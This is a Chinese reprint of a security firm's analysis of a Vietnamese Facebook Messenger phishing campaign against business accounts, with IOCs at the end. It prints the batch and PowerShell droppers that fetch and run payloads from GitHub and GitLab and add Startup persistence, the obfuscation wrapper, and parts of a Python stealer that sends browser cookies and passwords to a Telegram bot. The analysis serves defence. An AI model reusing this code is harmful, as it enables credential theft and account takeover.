越南黑客团体通过Facebook僵尸网络用户对企业账户发起钓鱼攻击

2023年 9月 21日 62.9k 0

Facebook 的 Messenger 平台在过去一个月遭到严重滥用,大量虚假和被劫持的个人账户不断传播带有恶意附件的消息。这些威胁行为者以 Facebook 平台上的数百万个企业帐户为目标——从高评价的市场卖家到大公司,通过虚假的商业查询,实现了惊人的“成功率”,大约每70 个人中就有1人被感染!

该活动再次源自越南的一个组织,它使用一个微小的压缩文件附件,其中包含一个强大的基于 Python 的窃取程序,该窃取程序被放入一个充满简单而有效的混淆方法的多阶段过程中。

在这篇文章中,我们将分享我们对该活动的分析,包括从受害者的角度以及威胁行为者的黑市生态系统来看它是如何出现的。所有这些都将说明这一行动及其强大的地下市场供应和需求如何成功地危害世界上最受欢迎的平台之一上的如此多的企业。

网络钓鱼 Facebook 企业帐户

收到来自陌生人的即时消息通常是一件有趣的事情,特别是如果这是一个新的商机。这正是这种网络钓鱼方法的全部内容 - 引诱企业主点击恶意附件,最终泄露他们的整个 Facebook 运营,并永远被锁定!

发送给企业的 Facebook Messenger 网络钓鱼消息的不同变体

具有声誉、卖家评级和大量关注者的 Facebook 帐户可以轻松地在黑市上获利。这些用于吸引广泛的受众来传播广告以及更多诈骗。此外,拥有 Facebook 企业帐户的个人可能在银行、电子商务、广告平台等其他平台上拥有其他高价值帐户,所有这些都可以直接从浏览器的 cookie 和密码文件中获取。这使他们成为诈骗者的理想目标。

复杂但熟悉的攻击流程

攻击流程是多种技术、自由/开放平台滥用以及众多混淆和隐藏方法的组合——总而言之,形成了一个相当复杂的流程。我们在过去发现的其他活动中看到了其中一些技术,例如“恶意发布”,而且这里的所有迹象都表明来自越南的威胁行为体团体的参与:

从 Messenger 网络钓鱼到利用 Telegram/Discord 窃取被盗数据的攻击流程

如上所述,攻击首先通过 Messenger 向企业帐户大量发送消息,然后是针对所有受害者已安装的浏览器的恶意窃取者有效负载,最后将被盗的会话 cookie 发送到威胁参与者的 IM 渠道。行动迅速而有效。

滥用 Facebook Messenger

这些消息的内容各不相同,但它们似乎都有相同的背景。有些消息可能是针对违反政策的页面的投诉,而其他消息可能是与企业帐户可能宣传的产品相关的问题。

每条消息都以不同的消息和主题变体、不同的文件名以及向不同的单词添加 Unicode 字符发送 - 所有这些都是为了使每条消息都独一无二并避免垃圾邮件发送者检测到。事实上,这些消息正在轻松进入 Facebook 业务套件收件箱:

显示包含恶意附件的网络钓鱼邮件的 BM 收件箱示例

有效载荷——虽小但致命

有效负载以 RAR 或 ZIP 格式存档,我们设法找到了几个变体,每个变体内部都包含一个文件 - 一个 Windows 批处理脚本:

双击附件将在资源管理器窗口中显示其内容

此批处理脚本充当第一阶段 Dropper,为您的系统准备真正的有效负载。它会下载另一个 zip 文件,该文件通常托管在 GitHub 或 GitLab 等免费代码托管平台上 - 正如此示例中所示:

@echo off
cls
set URL=https://github[.]com/xjnhzaj12b1/iscsicpl_bypassUAC/raw/main/4duong2.zip
set ZIP_PATH=C:UsersPublicmyFile.zip
set DESTINATION_FOLDER=C:UsersPublic
curl -L -o "%ZIP_PATH%" "%URL%"
powershell -command "Expand-Archive -LiteralPath '%ZIP_PATH%' -DestinationPath '%DESTINATION_FOLDER%'"
del "%ZIP_PATH%"
call "%DESTINATION_FOLDER%vn.cmd"
del "%DESTINATION_FOLDER%vn.cmd"
exit

提取的 zip 文件包含另一个批处理脚本文件vn.cmd,该文件直接执行,充当Stage II Dropper。当我们检查这个脚本时,我们首先揭示以下神秘的观点:

乍一看,这不像是可以执行的东西。答案在于编码。文本编辑器假定文件采用 UTF-16LE 编码,而实际上,大多数字符照常采用 ASCII 编码,只有前几个字符(以及最后一个字符)采用其他编码。这是一个巧妙的技巧,可以隐藏批处理文件的内容,以防止爱管闲事的分析师,尤其是自动扫描仪的发现。

这个看似损坏的脚本之所以能够工作,是因为批处理脚本是逐行执行的。即使第一行在这种情况下被损坏,剩余的行仍然会被执行。更改编码后,我们展示整个脚本:

@echo off
set dQ=u
set UA=P
setlocal EnableDelayedExpansion
set Og=:
set Uw=S
[..]
[..]
[..]
set dw=w
set XQ=]
set XA=
cls
start chrome https://www.alibaba.com/
C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/xjnhzaj12b2/home/-/raw/master/st  -OutFile "C:\Users\$([Environment]::UserName)\AppData\Roaming\Microsoft\Windows\'Start Menu'\Programs\Startup\WindowsSecure.bat";
C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/xjnhzaj12b2/home/-/raw/master/Document.zip -OutFile C:\Users\Public\Document.zip;
C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden Expand-Archive C:\Users\Public\Document.zip -DestinationPath C:\Users\Public\Document;
C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/xjnhzaj12b2/home/-/raw/master/achung3 -OutFile C:\Users\Public\Document\project.py;
C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -windowstyle hidden C:\Users\Public\Document\python C:\Users\Public\Document\project.py;
start chrome https://www.alibaba.com/

它以大量无害且冗余的设置命令开始,只是为了用良性代码填充它。接下来,真正的恶意部分开始了。批处理脚本执行 Chrome,将其指向阿里巴巴网站。为什么?嗯,为什么不呢?价格优惠。然而,这当然只是一种干扰。然后,它从与之前相同的 Github 存储库中提取一些额外的资源,并执行三个主要任务:

1. 通过解压创建独立的Python环境Documents.zip。

2. 提取主要的窃取功能 -project.py。

3. 使用 Python 环境执行主窃取程序。

4. WindowsSecure.bat以在每次启动时执行窃取程序的文件的形式添加持久性。

5种混淆程度

脚本形式的恶意负载使用 5 层混淆来隐藏其内容并动态生成以避免静态检测:

exec(__import__('marshal').loads(__import__('lzma')
.decompress(__import__('gzip')
.decompress(__import__('bz2')
.decompress(__import__('zlib')
.decompress(__import__('binascii')
.unhexlify(b"789c01e61419eb425a68393141592653...[VERY LONG STRING]...9e5")))))))

该代码被掩码为 ASCII 字符串,使用zlib bz2和进行压缩gzip,最后使用 进行压缩lzma。只有逆向此流程后,我们才能揭示实际的恶意负载(本例中省略了一些函数和代码):

fud = base64.b64decode("LTk2MjEyNDk0OA==").decode('utf-8')
crypt = base64.b64decode("aHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdDYzNzkwNDY3ODc6QUFGNmZfdTE4dXN1b01rcllqUUZtZWoyblNfODA1WE5NdE0vc2VuZERvY3VtZW50").decode('utf-8')

def check_chrome_running():
def find_profile(path_userdata):
def get_chrome(data_path,chrome_path):
def get_edge(data_path,edge_path):
def get_brave(data_path,brave_path):
def get_opera(data_path,opera_path):
def get_coccoc(data_path,coccoc_path):
def get_chromium(data_path,chromium_path):
def find_profile_firefox(firefox_path):
def get_firefox(data_path,firefox_path):
def encrypt(data_profile):
def getKey(afk):  
def encrypt_firefox(path_f):   
def delete_firefox(data_firefox_profile):
def delete_file(data_profile):
def delete_firefox(data_firefox_profile):
def decryptMoz3DES( globalSalt, entrySalt, encryptedData ):
def decodeLoginData(data):
def getLoginData(afkk):
def decryptPBE(decodedItem, globalSalt): #PBE pour Password Based Encryption 
def delete_file(data_profile):
def Compressed(z_ph,number):
def demso() :
def id() :
    
def main():
    number = "Thu Spam lần thứ " + str(demso())
    data_path = os.path.join(os.environ["TEMP"], name_f);os.mkdir(data_path)
    chrome = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data")
    firefox = os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming","Mozilla", "Firefox", "Profiles")
    Edge = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Microsoft", "Edge", "User Data")
    Opera = os.path.join(os.environ["USERPROFILE"], "AppData", "Roaming", "Opera Software", "Opera Stable")
    Brave = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","BraveSoftware", "Brave-Browser", "User Data")
    coccoc = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","CocCoc", "Browser", "User Data")
    chromium = os.path.join(os.environ["USERPROFILE"], "AppData", "Local","Chromium", "User Data")
    ...
    ...
    python310_path = r'C:UsersPublicDocument.zip'
    z_ph = os.path.join(os.environ["TEMP"], name_f +'.zip');shutil.make_archive(z_ph[:-4], 'zip', data_path)
    Compressed(z_ph,number)
    token = 'https://api[.]telegram[.]org/bot6186662136:AAGyzxWQ0OzgVZdDQyd0pDEHRJZU_GpMEiA/sendDocument';IDchat = '-921942879'
    with open(z_ph, 'rb') as f:
        x01.post(token,data={'caption':"ID:"+id()+"    nIP:"+ip+"     n"+number,'chat_id':IDchat},files={'document': f})
    shutil.rmtree(os.environ["TEMP"], name_f +'.zip');shutil.rmtree(os.environ["TEMP"], name_f)
    ...
    ...
main()

一个简单直接的 Python 脚本,可从受害者计算机上查找的几种流行浏览器中提取所有 cookie 和登录数据(保存的用户名和密码)。所有这些信息都会使用 Telegram 的/Discord 机器人 API 发送到电报频道,这是诈骗者的常见做法。换句话说——这是一个经典的偷窃者。

在这种情况下,最后一个好处是脚本在窃取 cookie 后实际上会删除所有 cookie。这会将受害者锁定在她/他的帐户之外,让诈骗者有时间劫持他们的会话并替换密码,因此受害者将无法撤销被盗的会话或自行更改密码。

越南威胁行为者的指纹

这名蟒蛇盗窃者揭示了这些威胁行为者的越南血统。发送到 Telegram 机器人的消息“Thu Spam lần thứ”附有执行时间计数器,从越南语翻译为“收集垃圾邮件 X 次”。第二个迹象是包含“ Coc Coc ”浏览器——越南人中流行的浏览器。

这些攻击者给我们留下了他们的机器人的 Telegram/Discord API 令牌,这样我们就可以了解一些关于他们的信息。在上述变体中,机器人的用户名是“ AChung8668_BOT ”。窃取者正在向名为“ ACHUNG — 21/8 — ❤️❤️❤️ ”的频道发送消息。该频道的管理员可能是此次攻击的幕后黑手之一,他自称“ MrTonyName ”。后来,我们发现了其他几个电报机器人,它们都使用相同的用户名。

Telegram 机器人之一用于窃取被盗数据

黑市正在蓬勃发展

快速浏览 Telegram 上的黑市,就会发现这些威胁行为者如何将他们的努力货币化,以及这个“市场”是多么繁荣和残酷。我们看到许多渠道和用户提供一切,从特定的高价值帐户到成百上千个被劫持的企业帐户(BM - 业务经理)的“日志”,具有声誉的广告帐户,甚至链接的支付方式和信用(代理帐户):

Telegram 消息广告被盗 Facebook 广告帐户待售

更多 Telegram 消息广告被盗 Facebook 验证企业账户待售

您可以直接从 Telegram 购买这些内容,也可以前往如下例所示的专用市场 — 可免费访问,无需基于 Tor/Onion 的浏览器。查看价格、获取样品和 24/7 支持:

被盗 Facebook 企业帐户的市场

在这里,您甚至可以获得有关如何快速登录被盗帐户并更改密码而不惊动 Facebook 保护检查点的具体教程。这些网站是越南语的,提供的英语翻译很差(可能是自动化的),如下所示:

有关如何使用被盗会话 cookie 劫持帐户的教程

令人震惊的统计数据和结论

尽管此网络钓鱼活动没有使用最有效的技术,并且需要受害者实际下载文件、解压缩并执行它,但我们的分析显示估计的感染统计数据非常令人震惊!

在下面的漏斗图中,我们看到了该活动在过去 30 天内的预估“转化率”。如果我们考虑整个 Facebook 企业帐户,我们会发现其中至少有7 %的帐户收到了网络钓鱼消息。我们看到大约0.4% 的人实际下载了附件 → 250 名受害者中有 1 人被感染!

漏斗图显示全球 250 个受感染账户中的 1 个账户

请注意,附件不会触发任何端点或防病毒保护,即使在 VT 上,在编写这些行时也只有部分样本几乎没有被检测到 2 次。有了这一点,并且认识到受害者是故意下载该文件的,我们只能假设受感染帐户的最终数量非常高且令人震惊!

威胁行为者拥有一支由机器人和虚假 Facebook 帐户组成的大军,以及数百万个企业帐户、页面和管理人员的列表,每周向世界各地的 Facebook 用户发送超过 10 万条网络钓鱼消息:

过去 30 天内全球活动分布

这是瓜迪奥所说的“安全差距”的另一个生动例子。威胁行为者总会找到新的方式来攻击我们、劫持社交帐户并滥用合法服务来进行恶意行为。我们在这里看到现代浏览器中的安全漏洞,这些漏洞保存着易于解密的密码,但仍然保存着易于访问的 cookie 和安全令牌。我们看到 Facebook 等社交服务如何仍然无法实时检测帐户劫持(这并不容易,但是……),以及这个黑市的生态系统如何蓬勃发展并吸引越来越多的威胁参与者一块馅饼。

尽可能保持警惕并准备好使用更多层的安全检测非常重要——你永远不知道下一拳会来自哪里。

IOCs

恶意代码托管 Git 存储库

gitlab[.]com/alibaba2023 
gitlab[.]com/brum 
gitlab[.]com/xjnhzaj12b2 
github[.]com/xjnhzaj12b1 
github[.]com/hahahoho9

域名

shoppingvideo247.com

文件示例

video-86-6p3wlfNcq3eV4ZVleoZZ-22100-18228.rar
ordered-products-VJi85uO5oOH4oD1fV6Px-22100-45036.rar
image_photo-36e671a6581cd099da8c0c9ed381e8888.rar
imɑɡᴇ-ρһᴏтᴏ-The-model-nᴇеԁеԁ-fоr-рurсһаѕе-adQhGSE3JOMBnptP3N7Y-22100-39448.rar
obraz-produkt-1615448759625_19599_4e232787b5053ac7f631b0c701d2159c_1.rar
product-list-for-Aug-2023-Kxl3A3HfLMbcDGdiTKMC-22100-30560.rar
imɑɡᴇ-ρһᴏтᴏ-pгodᴜct-scгeensһot-tZURtXCh5q2T2iDxAybe-22100-60540.zip
This-sample-GFjnFHhCZpYlP4nh5BXJ-22100-49236.rar
video-86-WDN5RYLLjBMP3gJ7AgPT-22100-85277.rar
New-product-pictures-xjuMkFdRwYLJurDlKlje-pmd-378400_n.rar
product-ordered_ixt6RyDk8Fj7VtBksriU-22100-47922.zip
image-product-103c3e2d4se43234ed22c19d3f47611e2e.rar
This-sample-dHRdSIfisNjwUYjUa6Do-22100-45138.rar
picture-was-taken-png_359471865_813853506964504_n.rar
Photo-Images-Product-Samples-2023-4-8.rar
Photo-images-Product-samples_2023-07-21-58.rar
This-sample-dHRdSIfisNjwUYjUa6Do-22100-45138.rar
𝖨mаɡе_оf_рrоԁuсt_9127хz-hp21y0MzqzbNKFplSJe2-22100-6718.rar
photo_2023-04-16_05-20-18-Q3hEwdwih6cAPyRiBAh0-22100-3252.rar
New-product-pictures-JC0bYRqCTC0h3FnSEaL7-pmd-902498_n.rar
Bestellinformationen-und-Fotos-fehlerhafter-Produkte.rar
video-86-W4Coe9eY9hyvxYr4odD6-22100-54438.rar
image-product-103c3e2d4se43234ed22c19d3f47611e2e.rar
photo_2023-04-16_05-20-18-RaYrfdEMiTAlpUgc6VVf-22100-91086.rar
photo_2023-04-16_05-20-18-SGFL0BAs67rrav0oNSFT-22100-15765.rar
imɑɡᴇ-ρһᴏтᴏ-The-model-nᴇеԁеԁ-fоr-рurсһаѕе-tX3HmHpSEpfYBcJr5ypF-22100-63274.rar
Photo_Image_Store-ro5Ws3sCB8sUo1jV9O32-22100-28797.zip
image_photo-36e671a6581cd099da8c0c9ed381e8888.rar
Images-Product_-3qs2xFGs96gi0tPddBV9-pmd-110434_n.rar
ordered-products-5Qnmx5w892JdQXGfTUfd-22100-25783.rar
photo_2023-08-16_05-20-18-CQWWKfldyrtIJcnYn1VM-22100-83264.rar
Images-Product_-kou2rNRKCOTaMtwWoQC9-pmd-284023_n.rar
Рооr-ԛuаⅼ𝗂tу-рrоԁuсt-nоt-аѕ-аԁvеrt𝗂ѕеԁ-7QqMqYZUXooQQ2PgDynu-22100-46392.rar
Product-pictures-2ETLmZJ0QMmXCvGFkX2B-pmd-307902_n.rar
Images-Product_ivUPMdMK3xkwM2eLFSdz-22100-74478.zip
photo_2022-12-08_22-35-30-IAcEYRly1XkstokOp4qM-22100-56726.rar
image_photo-36e671a6581cd099da8c0c9ed381e8888.rar
Información-de-pedido-y-fotos-de-productos-defectuosos.rar
Screenshot-of-the-product-to-buy-JrX1pW2UR1YIWc2dHsEH-22100-79154.zip

文件哈希值示例

a39f0c56dd602fcc14adcdeaa31c21d389af8ea8abcb89862fac19e2807c799d 
c8af31d897d7e2ee9babb6a60dec5b65fc4b018e4ce8da6a5d8008ce5926bd54 
1af8a147d6e 77ffcbf8e5dda14b32c715c4149b5e1c933fa69e451600ecfbf8e 
bca1c784742fc086d381f4e1e4495941626d1b829147d0d5f6d3f47af78364dd
3b0424a252a5cbadbb870907ed3c118cafc01ae86382f1775de5b9bc6cc3bce3
c116663954c00ef7be0ce7d391bed95fe0c1f775b97652906c49ec3fcd814719
3b99507af4fd76810ec8224122bc3701f7f2ef2cfa9677d012854df3abd44f5c
3f302fb736164983f04a9ebb8e2ab5604bb92380e8ccac8b160698fb02ccaebd
aaa953d2e18d4620a4a6e60c42f67a6e07cab05eec50e6e8f16f19cfa7c1d13b
9f1711a6157ba51b8e464ff4659c3a1db036e2e93721263e0091ed6fe53bf503
c93a22032bf5cf29ed22065ce572caca41152281852f8b81e034e1e64f4057f4
54cf73082944d966e232d74c33f0cd4e05411846d57fab35171369910be84eb1
93b023813d763ab355b82a3ce7693dbd668d80c3f0034fedbe16a5c44509f250
1c8482f6df65440bf98fdceddac178e841bc801f591de6b060c45b50136dff1f
10372d23b54e550926e59ec359aadf5180e9839cf20086473422d55b444353d6
9dd9cc235f8c2c753529955a351805e01229cc5052932561b0b96344537ce46c
e7cd3233fd39175970675135dac2c582382747b328b3786f8a833ae2ab8f4239
b14a6391e11fe1e2bbf9972e5fefb7579bfcb4177acf60bcf1fc39fdacd1ddfa
4883379040196cb4362ed4dfe4c011512febbfac7217e029f107b62c9acce6df
c95694003557ed3e22b29215ed8ee53c8560a1fbdc5ccce53aa3442aaf116a7e
098672353240df8cbbb7487ad1e3df3e25ceae3ad1dc84e451f03b803183e86a
377d76add32b18c33c0ade90cb355a1e9f0ead3b9a7060f56557fb1fe1b39434
aa3fde3269b630ce09e882ed0224b2271ebda197f5e5e4beb69994e9fc8ddc44
57ecb84193e327b58a62663d5e34d96503bbd81c461f91780b4f6bdb9fc4aabf
548acae9620f6541fa647dcbfe7ed2f3d9637f228b24bfcb0c7d17f34e83b8e5
474d1dcec292401ade40bd90a95b872e5ab2c8fb68737b786e4308444d3ad33a
91dff3d1e940290529d064a0b13e190e6231679ea067df399de559d5bd071d81
171169cf8c15ae6404f3849274fdbbe0cabc4f3ec0b65a3441228b1dbe31a0d6
e3579f1112a695c5117dff5830ef64bf47703943e7ee7dbd32086c7865fcf126
d0237b6e1ab07c8300ad282ed3aa1f6e0e90220d893bbeee26786e886cedb9ad
12444acca1f75247e756516a5d3ca2a33d67641f0664c00c3220f141b3dd8ce1
3bf11184b67b82e367d36cb9ed3380a43814b000d84aef0bb89d4e08e4fcd581
0ed36afbfe255076e759c8fe4dca89b0e0d0de82c4ffd822f4f589f8b0f39688
97252bdb029fcdc9cfda86688a6327f76ea780761a3c1736db6a368ea30ffa14
82c29d1bbb6ef9f3aff4d3ca91f3ec6dfc17018ec0e6da32d080658a19502db6
463a5ad91dd8adc56d700c059770de8ee01b3ba5bc276d17db872cc69d6768bf

转载来源:https://labs.guard.io/mrtonyscam-botnet-of-facebook-users-launch-high-intent-messenger-phishing-attack-on-business-3182cfb12f4d

图片来源网络侵权可联系删除

相关文章

Mallox勒索软件新Linux变种现世
伪装成破解程序和商业工具的新型恶意软件正在传播
Orcinius后门新样本分析
Poseidon窃取程序通过Google广告感染Mac用户
大选开始之际,欧盟各政党遭受 DDoS 攻击
微软2024

发布评论